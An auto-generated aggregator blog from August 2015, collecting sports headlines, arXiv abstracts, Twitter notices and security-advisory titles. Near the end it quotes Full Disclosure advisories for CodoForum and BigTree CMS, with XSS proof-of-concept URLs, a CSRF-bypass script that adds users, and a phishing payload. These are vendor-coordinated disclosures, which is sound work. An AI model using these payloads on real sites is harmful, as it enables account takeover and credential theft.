Latest YouTube Video
Saturday, August 15, 2015
anonymous
from Google Alert - anonymous http://ift.tt/1gLtcai
via IFTTT
Orioles Highlight: Chris Davis hits 2 HRs, the 2nd a walk-off, in 4-3 win over A's; Davis 34 HR, 15 since All-Star break (ESPN)
via IFTTT
Ravens: John Harbaugh uses political analogy when talking about training NFL officials, says \"I'm going Trump here\" (ESPN)
via IFTTT
Dortmund, Leicester earn impressive league victories
from FOX Sports Digital http://ift.tt/1DTBMim
via IFTTT
Casillas keeps clean sheet in debut win for Porto
from FOX Sports Digital http://ift.tt/1HOjhqn
via IFTTT
Zenit slips to defeat as CSKA tops Russian table
from FOX Sports Digital http://ift.tt/1HOjeed
via IFTTT
Mexico defender Moreno joins PSV from Espanyol
from FOX Sports Digital http://ift.tt/1DVYohX
via IFTTT
Orioles: OF Henry Urrutia recalled from Triple-A (.292, 10 HR, 50 RBI in 107 games); OF Junior Lake optioned to Triple-A (ESPN)
via IFTTT
Stoke scores 2 late goals, salvages 2-2 draw at Spurs
from FOX Sports Digital http://ift.tt/1IRuevb
via IFTTT
Saint-Etienne concedes late goal in 1-1 draw vs. Bordeaux
from FOX Sports Digital http://ift.tt/1TGvYQf
via IFTTT
Promoted Norwich beats Sunderland 3-1 in Premier League
from FOX Sports Digital http://ift.tt/1TGfMhH
via IFTTT
Surprising Leicester earns 2nd straight Premier League win
from FOX Sports Digital http://ift.tt/1TGfM1m
via IFTTT
Schalke begins Bundesliga with 3-0 win at Werder Bremen
from FOX Sports Digital http://ift.tt/1IRqObI
via IFTTT
Spurs sign Njie to bolster striker options
from FOX Sports Digital http://ift.tt/1IQTcee
via IFTTT
Orioles Highlight: Manny Machado hits walk-off 2-run HR in 13th in 8-6 win over A's; Adam Jones 3-run HR, Chris Davis HR (ESPN)
via IFTTT
Comet Dust over Enchanted Rock
Friday, August 14, 2015
The Merry Andrew by Anonymous
from Google Alert - anonymous http://ift.tt/1IPuXwN
via IFTTT
[FD] ERPSCAN Research Advisory [ERPSCAN-15-012] SAP Afaria 7 XComms – Buffer Overflow
Source: Gmail -> IFTTT-> Blogger
Bilbao routs Barcelona 4-0 in 1st leg of Spanish Super Cup
from FOX Sports Digital http://ift.tt/1IRyx7A
via IFTTT
Bayern kicks off season with 5-0 win over Hamburg
from FOX Sports Digital http://ift.tt/1hCWDfv
via IFTTT
Monaco held to goalless draw by Lille in French league
from FOX Sports Digital http://ift.tt/1N8dtzS
via IFTTT
FIFA bribery suspect agrees his extradition to Nicaragua
from FOX Sports Digital http://ift.tt/1Lcksrj
via IFTTT
Prosecutor seeks extradition of more FIFA defendants
from FOX Sports Digital http://ift.tt/1Lc8gqu
via IFTTT
Newcomer Buerki picked over veteran Weidenfeller in Dortmund
from FOX Sports Digital http://ift.tt/1JXbyfA
via IFTTT
Bundesliga newcomer Darmstadt signs defender Gyoergy Garics
from FOX Sports Digital http://ift.tt/1Wp9bXT
via IFTTT
Swiss players banned for cash to team that beat league rival
from FOX Sports Digital http://ift.tt/1J8kNJ2
via IFTTT
ISS Daily Summary Report – 08/13/15
from ISS On-Orbit Status Report http://ift.tt/1hC5z4Y
via IFTTT
Facebook Fired An Intern After He Exposes How to Track Users' Location
from The Hacker News http://ift.tt/1Kln8wN
via IFTTT
I have a new follower on Twitter
Upol Ehsan
Lead, #Research & Development ♦ Philosopher of Mind ♦ #Social #entrepreneur ♦ Futurist ♦ #InternetOfThngs and Open #innovation advocate ♦ @manUnited fan
http://t.co/YlAzioxwqX
Following: 2801 - Followers: 3389
August 14, 2015 at 08:03AM via Twitter http://twitter.com/UpolEhsan
French league relegation spots kept to 3 after court ruling
from FOX Sports Digital http://ift.tt/1ErmPPg
via IFTTT
Barcelona sends reserve player Adama Traore to Aston Villa
from FOX Sports Digital http://ift.tt/1ErghQG
via IFTTT
Ransomware Attacks Threaten Wearable Devices and Internet of Things
from The Hacker News http://ift.tt/1N72Tcg
via IFTTT
Leipzig given 2-0 German Cup win after lighter hits referee
from FOX Sports Digital http://ift.tt/1h9lM1s
via IFTTT
I have a new follower on Twitter
Max Foundry
We build and develop the awesome WordPress Button Plugin http://t.co/jWWuwPeoJn, WordPress Gallery Platform http://t.co/0cH2HebgC2 and http://t.co/9opivbIdKU
Columbus & San Francisco
http://t.co/dEwhk3iuKQ
Following: 817 - Followers: 4458
August 14, 2015 at 05:45AM via Twitter http://twitter.com/maxfoundry
Windows 10 Doesn't Stop Spying You, Even After Disabling It's Creepy Features
from The Hacker News http://ift.tt/1TzF2q0
via IFTTT
I have a new follower on Twitter
RSIP Vision
We provide cutting-edge image processing & computer vision R&D. Follow us for pixel & nerd news. @dr_felicityp tweets.For more detail please check out our site!
Worldwide
http://t.co/TW6nYc7VYM
Following: 889 - Followers: 835
August 14, 2015 at 01:04AM via Twitter http://twitter.com/RSIPvision
Moonless Meteors and the Milky Way
Thursday, August 13, 2015
Ravens: QB Joe Flacco nearly perfect, rookie DL Carl Davis impresses in preseason opener, writes Jamison Hensley (ESPN)
via IFTTT
Offerte su Amazon (@legrandiofferte) favorited one of your Tweets!
Source: Gmail -> IFTTT-> Blogger
Overeaters Anonymous
from Google Alert - anonymous http://ift.tt/1faQCF6
via IFTTT
Multiple-Path Selection for new Highway Alignments using Discrete Algorithms. (arXiv:1508.03064v1 [cs.DS])
This paper addresses the problem of finding multiple near-optimal, spatially-dissimilar paths that can be considered as alternatives in the decision making process, for finding optimal corridors in which to construct a new road. We further consider combinations of techniques for reducing the costs associated with the computation and increasing the accuracy of the cost formulation. Numerical results for five algorithms to solve the dissimilar multipath problem show that a "bidirectional approach" yields the fastest running times and the most robust algorithm. Further modifications of the algorithms to reduce the running time were tested and it is shown that running time can be reduced by an average of 56 percent without compromising the quality of the results.
from cs.AI updates on arXiv.org http://ift.tt/1h8c5QW
via IFTTT
Generation of Multimedia Artifacts: An Extractive Summarization-based Approach. (arXiv:1508.03170v1 [cs.AI])
We explore methods for content selection and address the issue of coherence in the context of the generation of multimedia artifacts. We use audio and video to present two case studies: generation of film tributes, and lecture-driven science talks. For content selection, we use centrality-based and diversity-based summarization, along with topic analysis. To establish coherence, we use the emotional content of music, for film tributes, and ensure topic similarity between lectures and documentaries, for science talks. Composition techniques for the production of multimedia artifacts are addressed as a means of organizing content, in order to improve coherence. We discuss our results considering the above aspects.
from cs.AI updates on arXiv.org http://ift.tt/1hAv7PT
via IFTTT
Talking about the Moving Image: A Declarative Model for Image Schema Based Embodied Perception Grounding and Language Generation. (arXiv:1508.03276v1 [cs.AI])
We present a general theory and corresponding declarative model for the embodied grounding and natural language based analytical summarisation of dynamic visuo-spatial imagery. The declarative model ---ecompassing spatio-linguistic abstractions, image schemas, and a spatio-temporal feature based language generator--- is modularly implemented within Constraint Logic Programming (CLP). The implemented model is such that primitives of the theory, e.g., pertaining to space and motion, image schemata, are available as first-class objects with `deep semantics' suited for inference and query. We demonstrate the model with select examples broadly motivated by areas such as film, design, geography, smart environments where analytical natural language based externalisations of the moving image are central from the viewpoint of human interaction, evidence-based qualitative analysis, and sensemaking.
Keywords: moving image, visual semantics and embodiment, visuo-spatial cognition and computation, cognitive vision, computational models of narrative, declarative spatial reasoning
from cs.AI updates on arXiv.org http://ift.tt/1L9LVac
via IFTTT
Joint Optimization of Masks and Deep Recurrent Neural Networks for Monaural Source Separation. (arXiv:1502.04149v3 [cs.SD] UPDATED)
Monaural source separation is important for many real world applications. It is challenging because, with only a single channel of information available, without any constraints, an infinite number of solutions are possible. In this paper, we explore joint optimization of masking functions and deep recurrent neural networks for monaural source separation tasks, including monaural speech separation, monaural singing voice separation, and speech denoising. The joint optimization of the deep recurrent neural networks with an extra masking layer enforces a reconstruction constraint. Moreover, we explore a discriminative criterion for training neural networks to further enhance the separation performance. We evaluate the proposed system on the TSP, MIR-1K, and TIMIT datasets for speech separation, singing voice separation, and speech denoising tasks, respectively. Our approaches achieve 2.30--4.98 dB SDR gain compared to NMF models in the speech separation task, 2.30--2.48 dB GNSDR gain and 4.32--5.42 dB GSIR gain compared to existing models in the singing voice separation task, and outperform NMF and DNN baselines in the speech denoising task.
from cs.AI updates on arXiv.org http://ift.tt/1BhZEJR
via IFTTT
[FD] [CVE-2015-5617]Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp cbNewsid
Source: Gmail -> IFTTT-> Blogger
[FD] BFS-SA-2015-002: OpenSSH PAM Privilege Separation Vulnerabilities
Source: Gmail -> IFTTT-> Blogger
[FD] APPLE-SA-2015-08-13-4 OS X Server v4.1.5
Source: Gmail -> IFTTT-> Blogger
[FD] APPLE-SA-2015-08-13-3 iOS 8.4.1
Source: Gmail -> IFTTT-> Blogger
[FD] APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006
Source: Gmail -> IFTTT-> Blogger
[FD] APPLE-SA-2015-08-13-1 Safari 8.0.8, Safari 7.1.8, and Safari 6.2.8
Source: Gmail -> IFTTT-> Blogger
Real Salt Lake signs forward Juan Manuel Martinez
from FOX Sports Digital http://ift.tt/1JfUNgU
via IFTTT
Max Foundry (@maxfoundry) favorited one of your Tweets!
Source: Gmail -> IFTTT-> Blogger
Change this Facebook Privacy Setting That Could Allow Hackers to Steal Your Identity
from The Hacker News http://ift.tt/1gEm9jE
via IFTTT
Is AA Right for You?
from Google Alert - anonymous http://ift.tt/1J2F52i
via IFTTT
Blatter urges European soccer to revive his '6 plus 5' rule
from FOX Sports Digital http://ift.tt/1IKQiYc
via IFTTT
2 clubs in top Czech league fined for anti-Islam posters
from FOX Sports Digital http://ift.tt/1J2sZpU
via IFTTT
Boring no more, Chelsea goes to City embroiled in doc row
from FOX Sports Digital http://ift.tt/1TxCRxU
via IFTTT
Augsburg signs Ghana defender Daniel Opare
from FOX Sports Digital http://ift.tt/1Wm1Eco
via IFTTT
ISS Daily Summary Report – 08/12/15
from ISS On-Orbit Status Report http://ift.tt/1IK36OB
via IFTTT
Bundesliga starts with Bayern Munich as big favorite
from FOX Sports Digital http://ift.tt/1h5mMDJ
via IFTTT
Marseille looking for new coach following Bielsa's departure
from FOX Sports Digital http://ift.tt/1P8MnWV
via IFTTT
Bayer Leverkusen signs Chile midfielder Charles Aranguiz
from FOX Sports Digital http://ift.tt/1Ncfc6v
via IFTTT
Lenovo Caught Using Rootkit to Secretly Install Unremovable Software
from The Hacker News http://ift.tt/1JVb89s
via IFTTT
[FD] Zend Framework <= 2.4.2 XML eXternal Entity Injection (XXE) on PHP FPM
Source: Gmail -> IFTTT-> Blogger
Milky Way and Exploding Meteor
Wednesday, August 12, 2015
Impact draw Whitecaps 2-2 in Canadian final opener
from FOX Sports Digital http://ift.tt/1L75vqf
via IFTTT
[FD] Update: Backdoor and RCE found in 8 TOTOLINK router models
Source: Gmail -> IFTTT-> Blogger
Learning to Hire Teams. (arXiv:1508.02823v1 [cs.AI])
Crowdsourcing and human computation has been employed in increasingly sophisticated projects that require the solution of a heterogeneous set of tasks. We explore the challenge of building or hiring an effective team, for performing tasks required for such projects on an ongoing basis, from an available pool of applicants or workers who have bid for the tasks. The recruiter needs to learn workers' skills and expertise by performing online tests and interviews, and would like to minimize the amount of budget or time spent in this process before committing to hiring the team. How can one optimally spend budget to learn the expertise of workers as part of recruiting a team? How can one exploit the similarities among tasks as well as underlying social ties or commonalities among the workers for faster learning? We tackle these decision-theoretic challenges by casting them as an instance of online learning for best action selection. We present algorithms with PAC bounds on the required budget to hire a near-optimal team with high confidence. Furthermore, we consider an embedding of the tasks and workers in an underlying graph that may arise from task similarities or social ties, and that can provide additional side-observations for faster learning. We then quantify the improvement in the bounds that we can achieve depending on the characteristic properties of this graph structure. We evaluate our methodology on simulated problem instances as well as on real-world crowdsourcing data collected from the oDesk platform. Our methodology and results present an interesting direction of research to tackle the challenges faced by a recruiter for contract-based crowdsourcing.
from cs.AI updates on arXiv.org http://ift.tt/1DOeZnD
via IFTTT
OOASP: Connecting Object-oriented and Logic Programming. (arXiv:1508.03032v1 [cs.AI])
Most of contemporary software systems are implemented using an object-oriented approach. Modeling phases -- during which software engineers analyze requirements to the future system using some modeling language -- are an important part of the development process, since modeling errors are often hard to recognize and correct.
In this paper we present a framework which allows the integration of Answer Set Programming into the object-oriented software development process. OOASP supports reasoning about object-oriented software models and their instantiations. Preliminary results of the OOASP application in CSL Studio, which is a Siemens internal modeling environment for product configurators, show that it can be used as a lightweight approach to verify, create and transform instantiations of object models at runtime and to support the software development process during design and testing.
from cs.AI updates on arXiv.org http://ift.tt/1DOeZnB
via IFTTT
Trend Filtering on Graphs. (arXiv:1410.7690v4 [stat.ML] UPDATED)
We introduce a family of adaptive estimators on graphs, based on penalizing the $\ell_1$ norm of discrete graph differences. This generalizes the idea of trend filtering [Kim et al. (2009), Tibshirani (2014)], used for univariate nonparametric regression, to graphs. Analogous to the univariate case, graph trend filtering exhibits a level of local adaptivity unmatched by the usual $\ell_2$-based graph smoothers. It is also defined by a convex minimization problem that is readily solved (e.g., by fast ADMM or Newton algorithms). We demonstrate the merits of graph trend filtering through examples and theory.
from cs.AI updates on arXiv.org http://ift.tt/ZXUQsd
via IFTTT
Orioles Video: Baltimore no-hit by Hisashi Iwakuma of Mariners; first time team no-hit since 2007 (Clay Buchholz) (ESPN)
via IFTTT
Videos of racism in English soccer can be uploaded to app
from FOX Sports Digital http://ift.tt/1UDFgcI
via IFTTT
Mariners: Hisashi Iwakuma's no-hitter was the team's 5th in franchise history and 3rd in last 4 seasons (ESPN)
via IFTTT
Breaking: Mariners P Hisashi Iwakuma throws no-hitter against Orioles; 7 K, 116 pitches in first career complete game (ESPN)
via IFTTT
Mariners P Hisashi Iwakuma has no-hitter in 9th inning vs. Orioles; tune to SportsCenter on ESPN (ESPN)
via IFTTT
Breaking: Mariners P Hisashi Iwakuma has a no-hitter through 8 innings against the Orioles; 7 K, 107 pitches (ESPN)
via IFTTT
Hearts goes top of Scottish league as Celtic draws
from FOX Sports Digital http://ift.tt/1IHORK4
via IFTTT
I have a new follower on Twitter
Miles Anthony Smith
Husband/Father, #Ambivert, #SerialSpecialist, Digital Marketer & #Audiobook Author Why #Leadership Sucks & Becoming #Generation Flux http://t.co/FUkXa8Pxil
Green Bay, Wisconsin
http://t.co/NAXy3aaINK
Following: 3122 - Followers: 3995
August 12, 2015 at 05:53PM via Twitter http://twitter.com/Miles_Anthony
MLB: Mariners P Hisashi Iwakuma has a no-hitter through 7 innings against the Orioles; 6 K, 90 pitches (ESPN)
via IFTTT
Measuring the Longitudinal Evolution of the Online Anonymous Marketplace Ecosystem
from Google Alert - anonymous http://ift.tt/1P7iXbG
via IFTTT
Anonymous Malaysia wants PM Najib Razak to resign, threatens cyber attack on Aug 29 , AsiaOne ...
from Google Alert - anonymous http://ift.tt/1DNDJfR
via IFTTT
[FD] The OAuth2 Complete plugin for WordPress uses a pseudorandom number generator which is non-cryptographically secure (WordPress plugin)
Source: Gmail -> IFTTT-> Blogger
[FD] BFS-SA-2015-001: Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability
Source: Gmail -> IFTTT-> Blogger
[FD] Open source tool for applying Google Chrome security updates
Source: Gmail -> IFTTT-> Blogger
Mariners: RF Nelson Cruz is not in Wednesday's lineup vs. Orioles after leaving Tuesday's game with neck spasms (ESPN)
via IFTTT
I have a new follower on Twitter
Traci Jones
The reports of my death have been greatly exaggerated.
Los Angeles
Following: 524 - Followers: 354
August 12, 2015 at 03:07PM via Twitter http://twitter.com/TraciJones79
Costa Rican national team coach Wanchope resigns following fight at game in Panama
from FOX Sports Digital http://ift.tt/1MkBtxW
via IFTTT
Mariano Nunez (@marianonunezdc) favorited one of your Tweets!
Source: Gmail -> IFTTT-> Blogger
Find a Meeting
from Google Alert - anonymous http://ift.tt/1L664AP
via IFTTT
I have a new follower on Twitter
Flow
Rapidly Design and Deploy Custom Cloud Based Data Automation Solutions.
https://t.co/HixZvF6akh
Following: 1157 - Followers: 769
August 12, 2015 at 12:35PM via Twitter http://twitter.com/flow_analytics
[FD] [Onapsis Security Advisory 2015-012] SAP Mobile Platform DataVault Predictable Encryption Password for Secure Storage
Source: Gmail -> IFTTT-> Blogger
[FD] [Onapsis Security Advisory 2015-010] SAP Mobile Platform DataVault Keystream Recovery
Source: Gmail -> IFTTT-> Blogger
[FD] [Onapsis Security Advisory 2015-011] SAP Mobile Platform DataVault Predictable encryption passwords for Configuration Values
Source: Gmail -> IFTTT-> Blogger
Messi, Suarez, Ronaldo in running for UEFA Best Player award
from FOX Sports Digital http://ift.tt/1WiHXSQ
via IFTTT
Costa Rica coach Wanchope in stadium fist fight
from FOX Sports Digital http://ift.tt/1IGrPn5
via IFTTT
ISS Daily Summary Report – 08/11/15
from ISS On-Orbit Status Report http://ift.tt/1L5FzLJ
via IFTTT
[FD] bizidea Design CMS 2015Q3 - SQL Injection Vulnerability
Source: Gmail -> IFTTT-> Blogger
Czech captain Tomas Rosicky could miss Euro 2016 qualifiers
from FOX Sports Digital http://ift.tt/1HG2vcJ
via IFTTT
Soccer player treated for cancer wins case over stopped pay
from FOX Sports Digital http://ift.tt/1L5sZMG
via IFTTT
Footballer treated for cancer wins case over stopped pay
from FOX Sports Digital http://ift.tt/1MjCl5W
via IFTTT
I have a new follower on Twitter
Zach Alfaro
Online marketer's have very busy lives. I'll help you lead a more productive, successful & happy lifestyle through science-backed research & psychological hacks
Australia
http://t.co/GJPRvVxGDX
Following: 3503 - Followers: 3424
August 12, 2015 at 05:47AM via Twitter http://twitter.com/Kaizen_Creative
Contact Us
from Google Alert - anonymous http://ift.tt/1L4YOlW
via IFTTT
Harald Nielsen, who scored 6 at 1960 Olympics, dies at 73
from FOX Sports Digital http://ift.tt/1WhX0MA
via IFTTT
ADO goalkeeper turns goal poacher with back heel vs PSV
from FOX Sports Digital http://ift.tt/1IYjB6D
via IFTTT
Download Free Windows 10 for the Internet of Things and Raspberry Pi 2
from The Hacker News http://ift.tt/1P61nF3
via IFTTT
I have a new follower on Twitter
Ted Clark
Data Guy #BigData #SQLServer #datablending #crossfit #crossfitkids @sonicxfitkids #seeyouatsonic http://t.co/54s59LdQOn
#seattle #wallingford
http://t.co/1OZlLz5z6O
Following: 3672 - Followers: 3738
August 12, 2015 at 05:01AM via Twitter http://twitter.com/tedclark
Susie (@henson40) retweeted your Tweet!
Source: Gmail -> IFTTT-> Blogger
Microsoft issues Security Patches for Windows 10 and Edge Browser
from The Hacker News http://ift.tt/1IFA5nh
via IFTTT
[FD] Stored XSS in iframe allows less privileged users to do almost anything an admin can (WordPress plugin)
Source: Gmail -> IFTTT-> Blogger
[FD] Reflected XSS in iframe allows unauthenticated users to do almost anything an admin can (WordPress plugin)
Source: Gmail -> IFTTT-> Blogger
[FD] Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data (WordPress plugin)
Source: Gmail -> IFTTT-> Blogger
[FD] Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users (WordPress plugin)
Source: Gmail -> IFTTT-> Blogger
[FD] CodoForum 3.3.1 Multiple SQL Injections
Source: Gmail -> IFTTT-> Blogger
[FD] CodoForum 3.3.1 Multiple Cross Site Scriptings
- sys/Ext/hybridauth/install.php:346 if( isset( $item["callback"] ) && $item["callback"] ){ $provider_callback_url = '' . $GLOBAL_HYBRID_AUTH_URL_BASE . '?hauth.done=' . $provider . ''; } XSS 2, 3 & 4 The page that manages users does not encode user input before echoing it, and is thus open to XSS. The vulnerable parameters are "username", "role", as well as "status". As the function retrieving POST request parameters uses GET parameters as fallback, it is possible to exploit this issue via POST or GET request. Sample POC: http://localhost/codoforum/admin/index.php?page=users&username=">&role=2&status=99 http://localhost/codoforum/admin/index.php?page=users&username=foo&role=2">&status=99 http://localhost/codoforum/admin/index.php?page=users&username=foo&role=2&status=9"> Code: // admin/modules/users.php:261 $role = getPost('role', '0'); $smarty->assign('role_selected', (($role == '0') ? '2' : $role)); [...] $filter_url.="&role=" . $role; [...] $status = getPost('status', 99); $smarty->assign('status_selected', $status); [...] $filter_url.="&status=" . $status; [...] $username = getPost('username', ""); $smarty->assign('entered_username', $username); [...] $filter_url.="&username=" . $username; XSS 5 The page that shows a list of users does not encode the "pno" argument, and is thus open to XSS. Sample POC: http://localhost/codoforum/admin/index.php?page=users&sort_order=DESC&pno=1">&sort_by=status Code: admin/modules/users.php:326 $sort_url = "index.php?page=users&sort_order=" . $isor . $filter_url . '&pno=' . $_GET['pno']; //put inverted link only for table heading $smarty->assign('sort_url', $sort_url); XSS 6 The page that shows plugins does not properly encode the "plugin" argument, and is thus open to XSS. Sample POC: http://localhost/codoforum/admin/index.php?page=ploader&plugin= Code: admin/modules/ploader.php:85
- '.$_GET['plugin'].'
- 3. Proof of Concept Codes: This proof of concept adds a new user by bypassing CSRF protection. In a similar way, the new user could be given admin rights. The script can be loaded from an external server by injecting as payload for the XSS vulnerabilities described above. var csrfProtectedPage = 'http://localhost/codoforum/admin/index.php?page=users'; // get valid token for current request var html = get(csrfProtectedPage); document.body.innerHTML = html; var form = document.getElementById('add_user_form'); var token = form.CSRF_token.value; // build form with valid token document.body.innerHTML += '
Source: Gmail -> IFTTT-> Blogger
[FD] BigTree CMS 4.2.3 Multiple Sql Injections
Source: Gmail -> IFTTT-> Blogger
[FD] BigTree CMS 4.2.3 Multiple Cross-Site-Scripting Vulnerabilities
core/admin/modules/pages/_properties.php:70 core/admin/layouts/default.php:153 / " XSS 4 (via GET) The "id" value described in the previous section is additionally echoed inside script tags, opening it up to a further XSS injection. Limitations: forward slash cannot be used and single and double quotes are escaped. Simple POC: http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/xsstest", }});}});alert(1);$("%23pages_pages").sortable({ axis: "y", containment: "parent", handle: ".icon_sort", items: "li", placeholder: "ui-sortable-placeholder", tolerance: "pointer", update: function() {$.ajax("", { type: "POST", data: { id: " Code: core/admin/modules/pages/_nav-tree.php:138 3. Proof of Concept Codes: 3.1 Example Phishing Site: The attack can for example be used for phishing, by displaying the login page and sending the data submitted by the victim to an attacker controlled server. var payload = document.createElement('div'); payload.innerHTML = " "; document.replaceChild(payload, document.documentElement); 4. Solution To mitigate this issue please upgrade at least to version 4.2.3: http://ift.tt/1h1JZH1 Please note that a newer version might already be available. 5. Report Timeline 07/07/2015 Informed Vendor about Issue 07/08/2015 Vendor send Fixes for confirmation 07/10/2015 Fixes Confirmed 07/26/2015 Vendor releases Version 4.2.3 08/07/2015 Disclosed to public
Source: Gmail -> IFTTT-> Blogger